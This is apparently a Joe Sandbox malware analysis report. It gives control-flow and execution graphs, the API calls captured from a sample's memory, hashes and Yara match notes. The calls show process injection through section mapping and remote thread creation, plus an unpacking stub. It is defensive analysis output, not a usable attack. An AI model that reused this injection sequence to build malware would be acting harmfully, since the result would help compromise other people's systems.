                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                            • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                            • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                            • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 455 6bf756-6bf790 call 6bfa69 458 6bf7de 455->458 459 6bf792-6bf7c5 VirtualAlloc call 6bf7e3 455->459 458->458 461 6bf7ca-6bf7dc 459->461 461->458
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006BF7A7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: 548c0fa538be18bb4cebbd3d67bb462e0953fc1cd6f1238371e01ae6bd049409
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: BB113C79A00208EFDB01DF98C985E98BFF5AF08350F0580A5F9489B362D771EA90DF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: beb7a10a03d9b0ed28564af6f41353144ed0c47f05dfeb756fcfa32a548a8fdb
                                                                                            • Instruction ID: ee7b618d3a6b5f73ac552ef94d60ebb6616fcfd5b210766eef61f14f849a0f0a
                                                                                            • Opcode Fuzzy Hash: beb7a10a03d9b0ed28564af6f41353144ed0c47f05dfeb756fcfa32a548a8fdb
                                                                                            • Instruction Fuzzy Hash: 07B012420496511FC2075754684B7C72FA5EF57340F4108C2A186DF8A3F59805034351

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.4%
                                                                                            Dynamic/Decrypted Code Coverage:42.5%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:113
                                                                                            Total number of Limit Nodes:4
                                                                                            execution_graph 4229 403043 4230 40319a 4229->4230 4231 40306d 4229->4231 4231->4230 4232 403128 RtlCreateUserThread NtTerminateProcess 4231->4232 4232->4230 4280 4014cf 4282 4014d3 4280->4282 4281 401571 4282->4281 4283 401660 NtDuplicateObject 4282->4283 4283->4281 4284 40167d NtCreateSection 4283->4284 4285 4016a3 NtMapViewOfSection 4284->4285 4286 4016fd NtCreateSection 4284->4286 4285->4286 4287 4016c6 NtMapViewOfSection 4285->4287 4286->4281 4288 401729 4286->4288 4287->4286 4289 4016e4 4287->4289 4288->4281 4290 401733 NtMapViewOfSection 4288->4290 4289->4286 4290->4281 4291 40175a NtMapViewOfSection 4290->4291 4291->4281 4195 76eca7 4196 76ecb6 4195->4196 4199 76f447 4196->4199 4204 76f462 4199->4204 4200 76f46b CreateToolhelp32Snapshot 4201 76f487 Module32First 4200->4201 4200->4204 4202 76f496 4201->4202 4203 76ecbf 4201->4203 4206 76f106 4202->4206 4204->4200 4204->4201 4207 76f131 4206->4207 4208 76f142 VirtualAlloc 4207->4208 4209 76f17a 4207->4209 4208->4209 4209->4209 4381 4015d5 4382 4015e4 4381->4382 4383 401660 NtDuplicateObject 4382->4383 4389 40177c 4382->4389 4384 40167d NtCreateSection 4383->4384 4383->4389 4385 4016a3 NtMapViewOfSection 4384->4385 4386 4016fd NtCreateSection 4384->4386 4385->4386 4387 4016c6 NtMapViewOfSection 4385->4387 4388 401729 4386->4388 4386->4389 4387->4386 4390 4016e4 4387->4390 4388->4389 4391 401733 NtMapViewOfSection 4388->4391 4390->4386 4391->4389 4392 40175a NtMapViewOfSection 4391->4392 4392->4389 4233 402f16 4236 402f1a 4233->4236 4234 402fa2 4236->4234 4237 401991 4236->4237 4238 4019a0 4237->4238 4239 4019d8 Sleep 4238->4239 4241 4019f3 4239->4241 4242 4014c4 4239->4242 4241->4234 4243 4014d3 4242->4243 4244 401660 NtDuplicateObject 4243->4244 4250 401571 4243->4250 4245 40167d NtCreateSection 4244->4245 4244->4250 4246 4016a3 NtMapViewOfSection 4245->4246 4247 4016fd NtCreateSection 4245->4247 4246->4247 4248 4016c6 NtMapViewOfSection 4246->4248 4249 401729 4247->4249 4247->4250 4248->4247 4251 4016e4 4248->4251 4249->4250 4252 401733 NtMapViewOfSection 4249->4252 4250->4241 4251->4247 4252->4250 4253 40175a NtMapViewOfSection 4252->4253 4253->4250 4352 402e9a 4353 402e5f 4352->4353 4355 402eaf 4352->4355 4354 402fa2 4355->4354 4356 401991 8 API calls 4355->4356 4356->4354 4254 5e0005 4259 5e092b GetPEB 4254->4259 4256 5e0030 4261 5e003c 4256->4261 4260 5e0972 4259->4260 4260->4256 4262 5e0049 4261->4262 4263 5e0e0f 2 API calls 4262->4263 4264 5e0223 4263->4264 4265 5e0d90 GetPEB 4264->4265 4266 5e0238 VirtualAlloc 4265->4266 4267 5e0265 4266->4267 4268 5e02ce VirtualProtect 4267->4268 4270 5e030b 4268->4270 4269 5e0439 VirtualFree 4273 5e04be LoadLibraryA 4269->4273 4270->4269 4272 5e08c7 4273->4272 4274 5e0001 4275 5e0005 4274->4275 4276 5e092b GetPEB 4275->4276 4277 5e0030 4276->4277 4278 5e003c 7 API calls 4277->4278 4279 5e0038 4278->4279 4210 5e003c 4211 5e0049 4210->4211 4223 5e0e0f SetErrorMode SetErrorMode 4211->4223 4216 5e0265 4217 5e02ce VirtualProtect 4216->4217 4219 5e030b 4217->4219 4218 5e0439 VirtualFree 4222 5e04be LoadLibraryA 4218->4222 4219->4218 4221 5e08c7 4222->4221 4224 5e0223 4223->4224 4225 5e0d90 4224->4225 4226 5e0dad 4225->4226 4227 5e0dbb GetPEB 4226->4227 4228 5e0238 VirtualAlloc 4226->4228 4227->4228 4228->4216 4304 402ee7 4305 402ef9 4304->4305 4306 401991 8 API calls 4305->4306 4307 402fa2 4305->4307 4306->4307 4429 4019a9 4430 4019a0 4429->4430 4431 4019d8 Sleep 4430->4431 4432 4014c4 7 API calls 4431->4432 4433 4019f3 4431->4433 4432->4433 4357 401975 4358 401979 4357->4358 4359 4014c4 7 API calls 4358->4359 4360 4019f3 4359->4360

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 100 401547 97->100 101 4015bd-4015d4 97->101 98->91 99 40152a-401535 98->99 99->96 102 401537-401543 99->102 103 401596-4015a6 100->103 104 401549-40154b 100->104 102->97 107 4015a8 103->107 104->107 108 40154d-40156d 104->108 110 4015e7-40160a call 401240 108->110 111 40156f 108->111 119 40160c 110->119 120 40160f-401614 110->120 114 401571 111->114 115 4015e2-4015e3 111->115 115->110 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 127 401631-40165a 122->127 128 40193c 122->128 123->120 126 40194b-40198e call 401240 123->126 127->128 136 401660-401677 NtDuplicateObject 127->136 128->126 136->128 138 40167d-4016a1 NtCreateSection 136->138 140 4016a3-4016c4 NtMapViewOfSection 138->140 141 4016fd-401723 NtCreateSection 138->141 140->141 143 4016c6-4016e2 NtMapViewOfSection 140->143 141->128 144 401729-40172d 141->144 143->141 146 4016e4-4016fa 143->146 144->128 147 401733-401754 NtMapViewOfSection 144->147 146->141 147->128 149 40175a-401776 NtMapViewOfSection 147->149 149->128 152 40177c 149->152 152->128 153 40177c call 401781 152->153 153->128
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                            • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                            • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                            • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 169 401631-40165a 164->169 170 40193c 164->170 165->162 168 40194b-40198e call 401240 165->168 169->170 178 401660-401677 NtDuplicateObject 169->178 170->168 178->170 180 40167d-4016a1 NtCreateSection 178->180 182 4016a3-4016c4 NtMapViewOfSection 180->182 183 4016fd-401723 NtCreateSection 180->183 182->183 185 4016c6-4016e2 NtMapViewOfSection 182->185 183->170 186 401729-40172d 183->186 185->183 188 4016e4-4016fa 185->188 186->170 189 401733-401754 NtMapViewOfSection 186->189 188->183 189->170 191 40175a-401776 NtMapViewOfSection 189->191 191->170 194 40177c 191->194 194->170 195 40177c call 401781 194->195 195->170
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                            • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                            • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                            • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 211 401631-40165a 206->211 212 40193c 206->212 207->204 210 40194b-40198e call 401240 207->210 211->212 220 401660-401677 NtDuplicateObject 211->220 212->210 220->212 222 40167d-4016a1 NtCreateSection 220->222 224 4016a3-4016c4 NtMapViewOfSection 222->224 225 4016fd-401723 NtCreateSection 222->225 224->225 227 4016c6-4016e2 NtMapViewOfSection 224->227 225->212 228 401729-40172d 225->228 227->225 230 4016e4-4016fa 227->230 228->212 231 401733-401754 NtMapViewOfSection 228->231 230->225 231->212 233 40175a-401776 NtMapViewOfSection 231->233 233->212 236 40177c 233->236 236->212 237 40177c call 401781 236->237 237->212
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                            • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                            • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                            • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 252 401631-40165a 247->252 253 40193c 247->253 248->245 251 40194b-40198e call 401240 248->251 252->253 261 401660-401677 NtDuplicateObject 252->261 253->251 261->253 263 40167d-4016a1 NtCreateSection 261->263 265 4016a3-4016c4 NtMapViewOfSection 263->265 266 4016fd-401723 NtCreateSection 263->266 265->266 268 4016c6-4016e2 NtMapViewOfSection 265->268 266->253 269 401729-40172d 266->269 268->266 271 4016e4-4016fa 268->271 269->253 272 401733-401754 NtMapViewOfSection 269->272 271->266 272->253 274 40175a-401776 NtMapViewOfSection 272->274 274->253 277 40177c 274->277 277->253 278 40177c call 401781 277->278 278->253
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                            • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                            • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                            • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 292 401631-40165a 287->292 293 40193c 287->293 288->285 291 40194b-40198e call 401240 288->291 292->293 301 401660-401677 NtDuplicateObject 292->301 293->291 301->293 303 40167d-4016a1 NtCreateSection 301->303 305 4016a3-4016c4 NtMapViewOfSection 303->305 306 4016fd-401723 NtCreateSection 303->306 305->306 308 4016c6-4016e2 NtMapViewOfSection 305->308 306->293 309 401729-40172d 306->309 308->306 311 4016e4-4016fa 308->311 309->293 312 401733-401754 NtMapViewOfSection 309->312 311->306 312->293 314 40175a-401776 NtMapViewOfSection 312->314 314->293 317 40177c 314->317 317->293 318 40177c call 401781 317->318 318->293
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                            • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                            • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                            • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1921587553-0
                                                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 5e003c-5e0047 1 5e004c-5e0263 call 5e0a3f call 5e0e0f call 5e0d90 VirtualAlloc 0->1 2 5e0049 0->2 17 5e028b-5e0292 1->17 18 5e0265-5e0289 call 5e0a69 1->18 2->1 20 5e02a1-5e02b0 17->20 22 5e02ce-5e03c2 VirtualProtect call 5e0cce call 5e0ce7 18->22 20->22 23 5e02b2-5e02cc 20->23 29 5e03d1-5e03e0 22->29 23->20 30 5e0439-5e04b8 VirtualFree 29->30 31 5e03e2-5e0437 call 5e0ce7 29->31 33 5e04be-5e04cd 30->33 34 5e05f4-5e05fe 30->34 31->29 36 5e04d3-5e04dd 33->36 37 5e077f-5e0789 34->37 38 5e0604-5e060d 34->38 36->34 40 5e04e3-5e0505 36->40 41 5e078b-5e07a3 37->41 42 5e07a6-5e07b0 37->42 38->37 43 5e0613-5e0637 38->43 51 5e0517-5e0520 40->51 52 5e0507-5e0515 40->52 41->42 44 5e086e-5e08be LoadLibraryA 42->44 45 5e07b6-5e07cb 42->45 46 5e063e-5e0648 43->46 50 5e08c7-5e08f9 44->50 48 5e07d2-5e07d5 45->48 46->37 49 5e064e-5e065a 46->49 53 5e07d7-5e07e0 48->53 54 5e0824-5e0833 48->54 49->37 55 5e0660-5e066a 49->55 57 5e08fb-5e0901 50->57 58 5e0902-5e091d 50->58 59 5e0526-5e0547 51->59 52->59 60 5e07e4-5e0822 53->60 61 5e07e2 53->61 56 5e0839-5e083c 54->56 62 5e067a-5e0689 55->62 56->44 63 5e083e-5e0847 56->63 57->58 66 5e054d-5e0550 59->66 60->48 61->54 64 5e068f-5e06b2 62->64 65 5e0750-5e077a 62->65 67 5e084b-5e086c 63->67 68 5e0849 63->68 69 5e06ef-5e06fc 64->69 70 5e06b4-5e06ed 64->70 65->46 72 5e0556-5e056b 66->72 73 5e05e0-5e05ef 66->73 67->56 68->44 74 5e06fe-5e0748 69->74 75 5e074b 69->75 70->69 76 5e056f-5e057a 72->76 77 5e056d 72->77 73->36 74->75 75->62 78 5e057c-5e0599 76->78 79 5e059b-5e05bb 76->79 77->73 84 5e05bd-5e05db 78->84 79->84 84->66
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E024D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5e0000_dghchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: cess$kernel32.dll
                                                                                            • API String ID: 4275171209-1230238691
                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction ID: 8d9f06940a44e2be45beeee2e4bbecad622b7844b54902dca0b4f5182f6b35db
                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction Fuzzy Hash: A9526874A00269DFDB64CF59C984BA8BBB1BF09304F1480D9E94DAB391DB70AE85DF14

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 336 76f447-76f460 337 76f462-76f464 336->337 338 76f466 337->338 339 76f46b-76f477 CreateToolhelp32Snapshot 337->339 338->339 340 76f487-76f494 Module32First 339->340 341 76f479-76f47f 339->341 342 76f496-76f497 call 76f106 340->342 343 76f49d-76f4a5 340->343 341->340 346 76f481-76f485 341->346 347 76f49c 342->347 346->337 346->340 347->343
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0076F46F
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0076F48F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_75d000_dghchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: d159c62df291c6e08ebb76ecf766b05b7b48702e16e5c3317d10b3814daed86e
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: 0FF06232200715ABD7202AF5B88DA6B7AE8AF49765F140538FA57914C0DF78EC454A61

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 349 5e0e0f-5e0e24 SetErrorMode * 2 350 5e0e2b-5e0e2c 349->350 351 5e0e26 349->351 351->350
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,005E0223,?,?), ref: 005E0E19
                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,005E0223,?,?), ref: 005E0E1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5e0000_dghchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction ID: cea14cca2211f37e0d6e011ac58af5d885f71300399aca2e74a7d4b784c7d1e3
                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction Fuzzy Hash: 0FD0123114512877D7002A95DC09BCD7F1CDF05B62F008421FB0DD9080C7B0994046E5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                            • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                            • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
